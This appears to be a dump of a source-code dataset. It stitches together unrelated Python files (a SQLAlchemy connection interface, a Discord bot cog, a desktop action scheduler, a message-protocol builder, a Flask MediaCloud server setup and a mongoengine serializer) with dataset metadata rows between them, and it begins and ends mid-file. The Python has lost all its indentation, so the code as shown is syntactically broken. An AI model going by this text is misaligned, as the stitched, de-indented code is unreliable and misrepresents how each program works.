"""Return the DBAPI ``cursor.rowcount`` value, or in some
cases an interpreted value.
See :attr:`.ResultProxy.rowcount` for details on this.
"""
raise NotImplementedError()
class Connectable(object):
"""Interface for an object which supports execution of SQL constructs.
The two implementations of :class:`.Connectable` are
:class:`.Connection` and :class:`.Engine`.
Connectable must also implement the 'dialect' member which references a
:class:`.Dialect` instance.
"""
def connect(self, **kwargs):
"""Return a :class:`.Connection` object.
Depending on context, this may be ``self`` if this object
is already an instance of :class:`.Connection`, or a newly
procured :class:`.Connection` if this object is an instance
of :class:`.Engine`.
"""
def contextual_connect(self):
"""Return a :class:`.Connection` object which may be part of an ongoing
context.
Depending on context, this may be ``self`` if this object
is already an instance of :class:`.Connection`, or a newly
procured :class:`.Connection` if this object is an instance
of :class:`.Engine`.
"""
raise NotImplementedError()
@util.deprecated("0.7",
"Use the create() method on the given schema "
"object directly, i.e. :meth:`.Table.create`, "
":meth:`.Index.create`, :meth:`.MetaData.create_all`")
def create(self, entity, **kwargs):
"""Emit CREATE statements for the given schema entity.
"""
raise NotImplementedError()
@util.deprecated("0.7",
"Use the drop() method on the given schema "
"object directly, i.e. :meth:`.Table.drop`, "
":meth:`.Index.drop`, :meth:`.MetaData.drop_all`")
def drop(self, entity, **kwargs):
"""Emit DROP statements for the given schema entity.
"""
raise NotImplementedError()
def execute(self, object, *multiparams, **params):
"""Executes the given construct and returns a :class:`.ResultProxy`."""
raise NotImplementedError()
def scalar(self, object, *multiparams, **params):
"""Executes and returns the first column of the first row.
The underlying cursor is closed after execution.
"""
raise NotImplementedError()
def _run_visitor(self, visitorcallable, element,
**kwargs):
raise NotImplementedError()
def _execute_clauseelement(self, elem, multiparams=None, params=None):
raise NotImplementedError()
class ExceptionContext(object):
"""Encapsulate information about an error condition in progress.
This object exists solely to be passed to the
:meth:`.ConnectionEvents.handle_error` event, supporting an interface that
can be extended without backwards-incompatibility.
.. versionadded:: 0.9.7
"""
connection = None
"""The :class:`.Connection` in use during the exception.
This member is always present.
"""
cursor = None
"""The DBAPI cursor object.
May be None.
"""
statement = None
"""String SQL statement that was emitted directly to the DBAPI.
May be None.
"""
parameters = None
"""Parameter collection that was emitted directly to the DBAPI.
May be None.
"""
original_exception = None
"""The exception object which was caught.
This member is always present.
"""
sqlalchemy_exception = None
"""The :class:`sqlalchemy.exc.StatementError` which wraps the original,
and will be raised if exception handling is not circumvented by the event.
May be None, as not all exception types are wrapped by SQLAlchemy.
For DBAPI-level exceptions that subclass the dbapi's Error class, this
field will always be present.
"""
chained_exception = None
"""The exception that was returned by the previous handler in the
exception chain, if any.
If present, this exception will be the one ultimately raised by
SQLAlchemy unless a subsequent handler replaces it.
May be None.
"""
execution_context = None
"""The :class:`.ExecutionContext` corresponding to the execution
operation in progress.
This is present for statement execution operations, but not for
operations such as transaction begin/end. It also is not present when
the exception was raised before the :class:`.ExecutionContext`
could be constructed.
Note that the :attr:`.ExceptionContext.statement` and
:attr:`.ExceptionContext.parameters` members may represent a
different value than that of the :class:`.ExecutionContext`,
potentially in the case where a
:meth:`.ConnectionEvents.before_cursor_execute` event or similar
modified the statement/parameters to be sent.
May be None.
"""
is_disconnect = None
"""Represent whether the exception as occurred represents a "disconnect"
condition.
This flag will always be True or False within the scope of the
:meth:`.ConnectionEvents.handle_error` handler.
SQLAlchemy will defer to this flag in order to determine whether or not
the connection should be invalidated subsequently. That is, by
assigning to this flag, a "disconnect" event which then results in
a connection and pool invalidation can be invoked or prevented by
changing this flag.
"""
|
mit
| -8,414,418,792,345,684,000 | 29.727181 | 84 | 0.658844 | false |
oyisre/discordbottery
|
cogs/tasks.py
|
1
|
2963
|
from discord.ext import commands
from cogs import queries
import aiohttp
import asyncio
import random
import time
# global vars
session = aiohttp.ClientSession()
class Tasks:
"""auto"""
def __init__(self, bot: commands.Bot):
self.bot = bot
async def zooboys(self):
""" sends a message to a certain server at the specified time """
await self.bot.wait_until_ready()
while not self.bot.is_closed:
cur_time = time.localtime()
if cur_time.tm_hour == 17 and cur_time.tm_min == 48:
await self.bot.send_message(self.bot.get_channel('144849743368028160'),
chr(random.randint(97, 122))) # Random letter
await asyncio.sleep(60)
async def who_up(self):
""" night watch """
await self.bot.wait_until_ready()
who_up_words = ['NOTION', 'NUTRIENT', 'SAD', ':clown::clown::clown:',
'NEIGHBOUR', 'WILD', 'THOT', 'DANIEL', 'NEUTRON', 'gnarls barkley',
'neutrino', 'nuremberg', 'sour', 'power!', 'coward', 'flower',
'idiot', 'useless', 'horus']
who_up_min = random.randint(27, 59)
who_up_hour = 5
while not self.bot.is_closed:
cur_time = time.localtime()
if cur_time.tm_hour == who_up_hour and cur_time.tm_min == who_up_min:
who_up_word = random.randint(0, len(who_up_words) - 1)
await self.bot.send_message(self.bot.get_channel(
'144849743368028160'),
"IT'S REAL {} HOURS".format(who_up_words[who_up_word]))
await asyncio.sleep(1)
await self.bot.send_message(self.bot.get_channel(
'144849743368028160'), "WHO UP")
# Useless now that the bing image api is gone
#res = 'first'
res = None
while res is not None:
res = await self.bot.wait_for_message(
timeout=180,
channel=self.bot.get_channel('144849743368028160'))
image_url = await queries.bing_img_search(
'real {} hours'.format(who_up_words[who_up_word]),
safe=False,
offset=random.randint(0, 100))
async with session.get(image_url) as r:
file_name = image_url.rsplit('/', 1)[1]
file = await r.read()
with open(file_name, 'wb') as f:
f.write(file)
with open(file_name, 'rb') as f:
await self.bot.send_file(
self.bot.get_channel('144849743368028160'), f,
filename=file_name)
await asyncio.sleep(59)
def close_aiohttp():
session.close()
|
unlicense
| 598,148,637,547,744,300 | 41.328571 | 91 | 0.498819 | false |
swprojects/Advanced-Action-Scheduler
|
advancedactionscheduler/schedulemanager.py
|
1
|
12301
|
# -*- coding: utf-8 -*
"""
@author Simon Wu <swprojects@runbox.com>
Copyright (c) 2018 by Simon Wu <Advanced Action Scheduler>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import logging
import platform
import subprocess
import time
import wx
import advwebbrowser
from ast import literal_eval as make_tuple
from apscheduler.triggers.cron import CronTrigger
from apscheduler.schedulers.background import BackgroundScheduler
PLATFORM = platform.system()
if PLATFORM == "Windows":
from win import actionmanager as actman
elif PLATFORM == "Linux":
from linux import actionmanager as actman
DELIMITER = " ➡ "
class Manager:
def __init__(self, parent):
self._parent = parent
self._schedules = {}
self._schedData = {}
self._webbrowser = advwebbrowser
self._browsers = {} # registered browsers
def AddSchedule(self, groupName, schedStr, enabled):
"""Parse the schedule string and add schedule"""
schedName, schedTime = schedStr.split(DELIMITER)
schedTime = make_tuple(schedTime)
schedTime = {k: v for k, v in schedTime}
params = {}
for timeVar in ["dof", "h", "m", "s"]:
if timeVar in schedTime:
params[timeVar] = ",".join([t for t in schedTime[timeVar]])
else:
params[timeVar] = "*"
schedule = BackgroundScheduler()
cronTrig = CronTrigger(day_of_week=params["dof"],
hour=params["h"],
minute=params["m"],
second=params["s"])
args = (groupName, schedName)
schedule.add_job(self.OnSchedule, args=[args], trigger=cronTrig)
# attach a listener to schedule events
try:
self._schedules[groupName].append((schedName, schedule, enabled))
except Exception as e:
logging.info(e)
self._schedules[groupName] = [(schedName, schedule, enabled)]
def AddScheduleItem(self, groupName, schedName, index, schedItemStr):
""" parse the schedItemStr to an action """
action, paramStr = schedItemStr.split(DELIMITER)
params = {k: v for k, v in make_tuple(paramStr)}
self._schedData[groupName][schedName].append((index, action, params))
def DoAction(self, groupName, schedName, action, kwargs):
logging.info("Executing action: %s" % action)
logging.info("parameters: %s" % str(kwargs))
logData = {"Group": groupName, "Schedule": schedName, "Message": action}
if action == "CloseWindow":
actman.CloseWindow(kwargs)
logData["Message"] = "CloseWindow: {0}".format(kwargs["window"])
elif action == "Delay":
delay = kwargs["delay"]
time.sleep(float(delay)) # remove the 's'
logData["Message"] = "Delay: {0} seconds".format(delay)
self.SendLog(logData)
elif action == "IfWindowOpen":
window = kwargs["window"]
kwargs["matches"] = 1
if not actman.FindWindow(kwargs):
logData["Message"] = "IfWindowOpen: {0} ...not found".format(window)
self.SendLog(logData)
return
else:
logData["Message"] = "IfWindowOpen: {0} ...found".format(window)
self.SendLog(logData)
elif action == "IfWindowNotOpen":
window = kwargs["window"]
kwargs["matches"] = 1
if not actman.FindWindow(kwargs):
logData["Message"] = "IfWindowOpen: {0} ...not found".format(window)
self.SendLog(logData)
else:
logData["Message"] = "IfWindowOpen: {0} ...found".format(window)
self.SendLog(logData)
return
elif action == "MouseClickAbsolute":
window = kwargs["window"]
actman.MouseClickAbsolute(kwargs)
logData["Message"] = "MouseClickRelative: {0}".format(window)
elif action == "MouseClickRelative":
window = kwargs["window"]
actman.MouseClickRelative(kwargs)
logData["Message"] = "MouseClickRelative: {0}".format(window)
elif action == "NewProcess":
# remove leading and trailing whitespace
cmd = [s.strip() for s in kwargs["cmd"].split(",")]
try:
subprocess.call(cmd)
logData["Message"] = "NewProcess: {0}".format(cmd)
except FileNotFoundError as e:
logData["Message"] = "NewProcess: {0}, {1}".format(cmd, e)
except PermissionError as e:
logData["Message"] = "NewProcess: {0}, {1}".format(cmd, e)
elif action == "OpenURL":
self.OpenURL(kwargs)
logData["Message"] = "OpenURL: {0}, {1}".format(kwargs["url"], kwargs["browser"])
elif action == "Power":
logData["Message"] = "Power: {0}, {1}".format(kwargs["action"], kwargs["alert"])
self.GetParent().OnPowerAction(kwargs)
elif action == "SwitchWindow":
kwargs["matches"] = 1
actman.SwitchWindow(kwargs)
logData["Message"] = "SwitchWindow: {0}".format(kwargs["window"])
self.SendLog(logData)
return True
def GetParent(self):
return self._parent
def OnSchedule(self, args):
groupName, schedName = args
childIgnore = ()
for index, action, params in self._schedData[groupName][schedName]:
if childIgnore and not index.startswith(childIgnore):
continue
# print(action)
if action == "StopSchedule":
schedule = params["schedule"]
self.StartSchedule(groupName, schedule, enable=0)
if schedule == schedName:
return
elif action == "StartSchedule":
schedule = params["schedule"]
self.StartSchedule(groupName, schedule, enable=1)
if schedule == schedName:
return
elif action == "Control":
logData = {"Group": groupName, "Schedule": schedName}
logData["Message"] = "Control: {0}".format(params["action"])
if params["action"] == "END":
self.SendLog(logData)
return
elif params["action"] == "Disable Schedule Manager":
self.GetParent().DisableScheduleManager()
self.SendLog(logData)
return
else:
a = self.DoAction(groupName, schedName, action, params)
if not a:
childIgnore + (index + ",", )
logData = {"Group": groupName, "Schedule": schedName, "Message": "Executed Schedule"}
self.SendLog(logData)
def OpenURL(self, kwargs):
url = kwargs["url"]
browser = kwargs["browser"]
browserclass = self._webbrowser.klasses[kwargs["browserclass"]]
newwindow = kwargs["newwindow"]
autoraise = kwargs["autoraise"]
try:
b = self._browsers[browser]
except KeyError:
self._webbrowser.register(browser, browserclass)
b = self._webbrowser.get(browser)
self._browsers[browser] = b
except Exception as e:
self.SendLog({"Message": "OpenURL: Error - {0}".format(e)})
return
if newwindow and autoraise:
b.open(url, new=1, autoraise=True)
elif newwindow and not autoraise:
b.open(url, new=1, autoraise=False)
elif not newwindow and autoraise:
b.open(url, new=2, autoraise=True)
elif not newwindow and not autoraise:
b.open(url, new=2, autoraise=False)
self.SendLog({"Message": "OpenURL: {1} ({0})".format(browser, url)})
def SendLog(self, message):
""" pass message to schedule manager lis """
parent = self.GetParent()
wx.CallAfter(parent.AddLogMessage, message)
def SetSchedules(self, data):
"""
receive a tuple list of (groupName, schedList)
"""
# stop and remove schedules first
self.Stop()
childIgnore = ()
# process schedule data
for groupName, schedList in data.items():
self._schedData[groupName] = {}
currentSched = None
for index, itemData in schedList:
# is a schedule?
if "," not in index:
# if itemData["checked"] == 0:
# childIgnore += (index+",",)
# continue
schedStr = itemData["columns"]["0"]
currentSched, _ = schedStr.split(DELIMITER)
self._schedData[groupName][currentSched] = []
self.AddSchedule(groupName, schedStr, itemData["checked"])
continue
if itemData["checked"] == 0 or index.startswith(childIgnore):
childIgnore += (index + ",", )
continue
schedItemStr = itemData["columns"]["0"]
self.AddScheduleItem(groupName, currentSched, index, schedItemStr)
def Start(self):
for groupName, groupScheds in self._schedules.items():
for schedName, schedule, enabled in groupScheds:
if enabled == 0:
continue
schedule.start()
self.SendLog({"Message": "Started schedule {0} from {1} group".format(schedName, groupName)})
def Stop(self):
""" shutdown all schedules """
for groupName, groupScheds in self._schedules.items():
for schedName, schedule, enabled in groupScheds:
if enabled == 0:
continue
schedule.shutdown(wait=False)
self.SendLog({"Message": "Stopped schedule {0} from {1} group".format(schedName, groupName)})
self.SendLog({"Message": "All running schedules have been stopped"})
# clear schedules and data
self._schedules = {}
self._schedData = {}
def StartSchedule(self, groupName, schedName, enable=1):
""" start/stop schedule """
logging.info("{0}, {1}".format(groupName, schedName))
found = None
enabled = None
for n, (name, schedule, e) in enumerate(self._schedules[groupName]):
# print(name, schedName)
if name != schedName:
continue
found = name
enabled = e
break
if not found:
if enable == 1:
msg = "StartSchedule: Could not find schedule {0} from group: {1}".format(schedName, groupName)
self.SendLog({"Message": msg})
else:
msg = "StopSchedule: Could not find schedule {0} from group: {1}".format(schedName, groupName)
self.SendLog({"Message": msg})
return
# start
if enable == 1 and enabled == 0:
self._schedules[groupName][n] = (name, schedule, 1)
schedule.start()
msg = "StartSchedule: {0} from group: {1}".format(schedName, groupName)
self.SendLog({"Message": msg})
elif enable == 1 and enabled == 1:
msg = "StartSchedule: {0} from group: {1} is already running".format(schedName, groupName)
self.SendLog({"Message": msg})
# stop
elif enable == 0 and enabled == 1:
self._schedules[groupName][n] = (name, schedule, 0)
schedule.shutdown(wait=False)
msg = "StopSchedule: {0} from group: {1}".format(schedName, groupName)
self.SendLog({"Message": msg})
elif enable == 0 and enabled == 0:
self._schedules[groupName][n] = (name, schedule, 0)
msg = "StopSchedule: {0} from group: {1} is already stopped".format(schedName, groupName)
self.SendLog({"Message": msg})
|
gpl-2.0
| 7,758,715,840,575,937,000 | 37.077399 | 111 | 0.553947 | false |
Karandash8/CLAUDE
|
framework/message.py
|
1
|
8861
|
'''
Created on May 4, 2017
@author: andrei
'''
import logging
import abc
from framework.misc import exception
class PRTCL_SIGNATURE:
CLAUDE_SYS_PRTCL = 'CLAUDE-SYS-PRTCL'
CLAUDE_DSCVRY_PRTCL = 'CLAUDE-DSCVRY-PRTCL'
CLI_TO_JM_PRTCL = 'CLI-TO-JM-PRTCL'
JM_TO_JS_PRTCL = 'JM-TO-JS-PRTCL'
JS_TO_RD_PRTCL = 'JS-TO-RD-PRTCL'
RD_TO_JM_PRTCL = 'RD-TO-JM-PRTCL'
class MSG_HEADER(object):
"""
"""
header_len = 5
signature_pos = 0
src_pos = 1
dst_pos = 2
version_pos = 3
msg_type_pos = 4
class Header(object):
def __init__(self, header_list):
self._header_as_list = header_list
def get_prtcl_signature(self):
return self._header_as_list[MSG_HEADER.signature_pos]
def get_src(self):
return self._header_as_list[MSG_HEADER.src_pos]
def get_dst(self):
return self._header_as_list[MSG_HEADER.dst_pos]
def get_version(self):
return self._header_as_list[MSG_HEADER.version_pos]
def get_msg_type(self):
return self._header_as_list[MSG_HEADER.msg_type_pos]
def as_list(self):
return self._header_as_list
def __str__(self):
return '<Header(%s)>' % (
self._header_as_list
)
class Message(object):
def __init__(self, header, body):
self.header = Header(header)
self._body_as_list = body
def get_header(self):
return self.header.as_list()
def get_body(self):
return self._body_as_list
def as_list(self):
return self.header.as_list() + self._body_as_list
def __str__(self):
return '<Message(header=%s, body=%s)>' % (
self.header.as_list(),
self._body_as_list
)
class IMessageBuilder(object):
"""
"""
__metaclass__ = abc.ABCMeta
class SysPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.CLAUDE_SYS_PRTCL
version = '1'
def create_add_endpoint(self, src, dst, channel_endpoint, endpoint_name, endpoint_str, routing_key, prtcl_handler):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [channel_endpoint, endpoint_name, endpoint_str, routing_key, prtcl_handler])
return msg
def create_del_endpoint(self, src, dst, endpoint_name):
msg_type = '2'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [endpoint_name])
return msg
class CliToJMPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.CLI_TO_JM_PRTCL
version = '1'
def create_new_job(self, src, dst, job_descriptor):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], job_descriptor)
return msg
def create_job_accepted(self, src, dst, job_name):
msg_type = '2'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name])
return msg
def create_job_done(self, src, dst, job_name, verbose_output):
msg_type = '3'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, verbose_output])
return msg
def create_job_failed(self, src, dst, job_name, error_text):
msg_type = '4'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, error_text])
return msg
class JMToJSPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.JM_TO_JS_PRTCL
version = '1'
def create_new_job(self, src, dst, job_descriptor):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], job_descriptor)
return msg
def create_job_accepted(self, src, dst, job_name):
msg_type = '2'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name])
return msg
def create_job_rejected(self, src, dst, job_name, error_text):
msg_type = '3'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, error_text])
return msg
class JSToRDPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.JS_TO_RD_PRTCL
version = '1'
def create_new_job(self, src, dst, job_descriptor):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], job_descriptor)
return msg
class RDToJMPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.RD_TO_JM_PRTCL
version = '1'
def create_job_done(self, src, dst, job_name, verbose_output):
msg_type = '1'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, verbose_output])
return msg
def create_job_failed(self, src, dst, job_name, error_text):
msg_type = '2'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [job_name, error_text])
return msg
class DscvryPrtclBuilder(IMessageBuilder):
"""
"""
prtcl_signature = PRTCL_SIGNATURE.CLAUDE_DSCVRY_PRTCL
version = '1'
def create_hello(self, src, dst, conn_id, recovery):
msg_type = '10'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, recovery])
return msg
def create_hello_ok(self, src, dst, conn_id):
msg_type = '20'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id])
return msg
def create_hello_er(self, src, dst, conn_id, error_text):
msg_type = '30'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, error_text])
return msg
def create_challenge_req(self, src, dst, conn_id, mechanism, challenge):
msg_type = '40'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, mechanism, challenge])
return msg
def create_challenge_rep(self, src, dst, conn_id, mechanism, response):
msg_type = '50'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, mechanism, response])
return msg
def create_join(self, src, dst, conn_id, group_name, member):
msg_type = '60'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, group_name] + member)
return msg
def create_join_ok(self, src, dst, conn_id, group_name):
msg_type = '70'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id] + group_name)
return msg
def create_join_er(self, src, dst, conn_id, error_text, group_name):
msg_type = '80'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, error_text] + group_name)
return msg
def create_spectate(self, src, dst, conn_id, group_name, status):
msg_type = '90'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, group_name, status])
return msg
def create_spectate_ok(self, src, dst, conn_id):
msg_type = '100'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id])
return msg
def create_spectate_er(self, src, dst, conn_id, error_text):
msg_type = '110'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, error_text])
return msg
def create_member_update(self, src, dst, conn_id, member):
msg_type = '120'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id] + member)
return msg
def create_group_update(self, src, dst, conn_id, init, group_name, member):
msg_type = '130'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id, init, group_name] + member)
return msg
def create_hbeat(self, src, dst, conn_id):
msg_type = '140'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id])
return msg
def create_bye(self, src, dst, conn_id):
msg_type = '150'
msg = Message([self.prtcl_signature, src, dst, self.version, msg_type], [conn_id])
return msg
|
gpl-3.0
| 3,793,492,110,004,785,000 | 28.638796 | 156 | 0.574879 | false |
mitmedialab/MediaCloud-Web-Tools
|
server/__init__.py
|
1
|
9337
|
import json
import logging.config
import os
import sys
import tempfile
from flask import Flask, render_template
from flask_webpack import Webpack
from flask_mail import Mail
import flask_login
from raven.conf import setup_logging
from raven.contrib.flask import Sentry
from raven.handlers.logging import SentryHandler
import mediacloud.api
from cliff.api import Cliff
import redis
import jinja2
from flask_executor import Executor
from server.sessions import RedisSessionInterface
from server.util.config import get_default_config, ConfigException
from server.commands import sync_frontend_db
from server.database import UserDatabase, AnalyticsDatabase
SERVER_MODE_DEV = "dev"
SERVER_MODE_PROD = "prod"
SERVER_APP_TOPICS = "topics"
SERVER_APP_SOURCES = "sources"
SERVER_APP_TOOLS = "tools"
SERVER_APP_EXPLORER = "explorer"
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
data_dir = os.path.join(base_dir, 'server', 'static', 'data')
# setup logging
with open(os.path.join(base_dir, 'config', 'server-logging.json'), 'r') as f:
logging_config = json.load(f)
logging_config['handlers']['file']['filename'] = os.path.join(base_dir,
logging_config['handlers']['file']['filename'])
logging.config.dictConfig(logging_config)
logger = logging.getLogger(__name__)
logger.info("---------------------------------------------------------------------------")
flask_login_logger = logging.getLogger('flask_login')
flask_login_logger.setLevel(logging.DEBUG)
# load the config helper
config = get_default_config()
server_mode = config.get('SERVER_MODE').lower()
if server_mode not in [SERVER_MODE_DEV, SERVER_MODE_PROD]:
logger.error("Unknown server mode '{}', set a mode in the `config/app.config` file".format(server_mode))
sys.exit(1)
else:
logger.info("Started server in %s mode", server_mode)
# setup optional sentry logging service
try:
handler = SentryHandler(config.get('SENTRY_DSN'))
handler.setLevel(logging.ERROR)
setup_logging(handler)
except ConfigException as e:
logger.info("no sentry logging")
# Connect to MediaCloud
TOOL_API_KEY = config.get('MEDIA_CLOUD_API_KEY')
mc = mediacloud.api.AdminMediaCloud(TOOL_API_KEY)
logger.info("Connected to mediacloud")
# Connect to CLIFF if the settings are there
cliff = None
try:
cliff = Cliff(config.get('CLIFF_URL'))
except KeyError as e:
logger.warning("no CLIFF connection")
NYT_THEME_LABELLER_URL = config.get('NYT_THEME_LABELLER_URL')
# Connect to the app's mongo DB
try:
user_db = UserDatabase(config.get('MONGO_URL'))
analytics_db = AnalyticsDatabase(config.get('MONGO_URL'))
user_db.check_connection()
logger.info("Connected to DB: {}".format(config.get('MONGO_URL')))
except Exception as err:
logger.error("DB error: {0}".format(err))
logger.exception(err)
sys.exit()
def is_dev_mode():
return server_mode == SERVER_MODE_DEV
def is_prod_mode():
return server_mode == SERVER_MODE_PROD
webpack = Webpack()
mail = Mail()
def create_app():
# Factory method to create the app
prod_app_name = config.get('SERVER_APP')
my_app = Flask(__name__)
# set up uploading
my_app.config['MAX_CONTENT_LENGTH'] = 1 * 1024 * 1024 # 1MB
my_app.config['UPLOAD_FOLDER'] = tempfile.gettempdir()
# Set up sentry logging
my_app.config['SENTRY_USER_ATTRS'] = ['email']
try:
sentry_dsn = config.get('SENTRY_DSN')
Sentry(my_app, dsn=sentry_dsn)
except ConfigException as ce:
logger.warning(ce)
# set up webpack
if is_dev_mode():
manifest_path = '../build/manifest.json'
else:
manifest_path = '../server/static/gen/{}/manifest.json'.format(prod_app_name)
webpack_config = {
'DEBUG': is_dev_mode(),
'WEBPACK_MANIFEST_PATH': manifest_path
}
# caching and CDN config
my_app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 7 * 24 * 60 * 60
try:
cdn_asset_url = config.get('ASSET_URL')
webpack_config['WEBPACK_ASSETS_URL'] = cdn_asset_url
logger.info("Asset pipeline: {}".format(cdn_asset_url))
except ConfigException:
logger.info("Asset pipeline: no cdn")
my_app.config.update(webpack_config)
webpack.init_app(my_app)
# set up mail sending
try:
if config.get('SMTP_ENABLED') == '1':
mail_config = { # @see https://pythonhosted.org/Flask-Mail/
'MAIL_SERVER': config.get('SMTP_SERVER'),
'MAIL_PORT': int(config.get('SMTP_PORT')),
'MAIL_USE_SSL': config.get('SMTP_USE_SSL'),
'MAIL_USERNAME': config.get('SMTP_USER'),
'MAIL_PASSWORD': config.get('SMTP_PASS'),
}
my_app.config.update(mail_config)
mail.init_app(my_app)
logger.info('Mailing from {} via {}'.format(config.get('SMTP_USER'), config.get('SMTP_SERVER')))
# need to tell jinja to look in "emails" directory directly for the shared email templates
# because the `imports` in them don't include relative paths
my_loader = jinja2.ChoiceLoader([
my_app.jinja_loader,
jinja2.FileSystemLoader([os.path.join(base_dir, 'server', 'templates'),
os.path.join(base_dir, 'server', 'templates', 'emails')])
])
my_app.jinja_loader = my_loader
else:
logger.warning("Mail configured, but not enabled")
except ConfigException as ce:
logger.exception(ce)
logger.warning("No mail configured")
# set up thread pooling
my_app.config['EXECUTOR_PROPAGATE_EXCEPTIONS'] = True
my_app.config['EXECUTOR_MAX_WORKERS'] = 20
# app.config['EXECUTOR_TYPE'] = 'thread' # valid options - 'thread' (default) or 'process'
# set up user login
cookie_domain = config.get('COOKIE_DOMAIN')
my_app.config['SESSION_COOKIE_NAME'] = "mc_session"
my_app.config['REMEMBER_COOKIE_NAME'] = "mc_remember_token"
if cookie_domain != 'localhost': # can't set cookie domain on localhost
my_app.config['SESSION_COOKIE_DOMAIN'] = cookie_domain
my_app.config['REMEMBER_COOKIE_DOMAIN'] = cookie_domain
# connect to the shared session storage
my_app.session_interface = RedisSessionInterface(redis.StrictRedis.from_url(config.get('SESSION_REDIS_URL')))
my_app.cli.add_command(sync_frontend_db)
return my_app
server_app = config.get('SERVER_APP')
app = create_app()
app.secret_key = config.get('SECRET_KEY')
# Create user login manager
login_manager = flask_login.LoginManager()
login_manager.init_app(app)
# connect executor pool to app, so it loads context for us automatically on each parallel process :-)
# using one shared executor pool for now - can revisit later if we need to
executor = Executor(app)
# set up all the views
@app.route('/')
def index():
logger.debug("homepage request")
try:
maintenance_mode = config.get('MAINTENANCE_MODE')
except ConfigException:
maintenance_mode = 0
return render_template('index.html',
cookie_domain=config.get('COOKIE_DOMAIN'),
maintenance_mode=maintenance_mode)
# now load in the appropriate view endpoints, after the app has been initialized
import server.views.user
import server.views.app
import server.views.admin.users
import server.views.admin.analytics
import server.views.download
import server.views.stories
import server.views.media_search
import server.views.media_picker
import server.views.sources.search
import server.views.metadata
import server.views.platforms
if (server_app == SERVER_APP_SOURCES) or is_dev_mode():
import server.views.sources.collection
import server.views.sources.collectionedit
import server.views.sources.source
import server.views.sources.feeds
import server.views.sources.suggestions
import server.views.sources.words
import server.views.sources.geocount
if (server_app == SERVER_APP_TOPICS) or is_dev_mode():
import server.views.topics.media
import server.views.topics.story
import server.views.topics.stories
import server.views.topics.topic
import server.views.topics.topiclist
import server.views.topics.topiccreate
import server.views.topics.topicsnapshot
import server.views.topics.words
import server.views.topics.platforms.platforms_manage
import server.views.topics.platforms.platforms_generic_csv
import server.views.topics.foci.focalsets
import server.views.topics.foci.focaldefs
import server.views.topics.foci.retweetpartisanship
import server.views.topics.foci.topcountries
import server.views.topics.foci.nyttheme
import server.views.topics.foci.mediatype
import server.views.topics.permissions
import server.views.topics.files
import server.views.topics.provider
if (server_app == SERVER_APP_EXPLORER) or is_dev_mode():
import server.views.explorer.explorer_query
import server.views.explorer.sentences
import server.views.explorer.words
import server.views.explorer.story_samples
import server.views.explorer.story_counts
import server.views.explorer.geo
import server.views.explorer.tags
import server.views.explorer.saved_searches
|
apache-2.0
| 5,585,641,705,978,839,000 | 35.615686 | 113 | 0.682339 | false |
ideanotion/infoneigeapi
|
api/serializers.py
|
1
|
3425
|
from __future__ import unicode_literals
from api.models import *
from rest_framework_mongoengine.serializers import MongoEngineModelSerializer
import warnings
from django.core.exceptions import ValidationError
from mongoengine.errors import ValidationError
from rest_framework import serializers
from rest_framework import fields
import mongoengine
from mongoengine.base import BaseDocument
from django.core.paginator import Page
from django.db import models
from django.forms import widgets
from django.utils.datastructures import SortedDict
from rest_framework.compat import get_concrete_model
from rest_framework_mongoengine.fields import ReferenceField, ListField, EmbeddedDocumentField, DynamicField
#override get_field to include LineStringField in the mapping
class MongoEngineModelSerializer2(MongoEngineModelSerializer):
def get_field(self, model_field):
kwargs = {}
if model_field.__class__ in (mongoengine.ReferenceField, mongoengine.EmbeddedDocumentField, mongoengine.ListField, mongoengine.DynamicField):
kwargs['model_field'] = model_field
kwargs['depth'] = self.opts.depth
if not model_field.__class__ == mongoengine.ObjectIdField:
kwargs['required'] = model_field.required
if model_field.__class__ == mongoengine.EmbeddedDocumentField:
kwargs['document_type'] = model_field.document_type
if model_field.default:
kwargs['required'] = False
kwargs['default'] = model_field.default
if model_field.__class__ == models.TextField:
kwargs['widget'] = widgets.Textarea
field_mapping = {
mongoengine.FloatField: fields.FloatField,
mongoengine.IntField: fields.IntegerField,
mongoengine.DateTimeField: fields.DateTimeField,
mongoengine.EmailField: fields.EmailField,
mongoengine.URLField: fields.URLField,
mongoengine.StringField: fields.CharField,
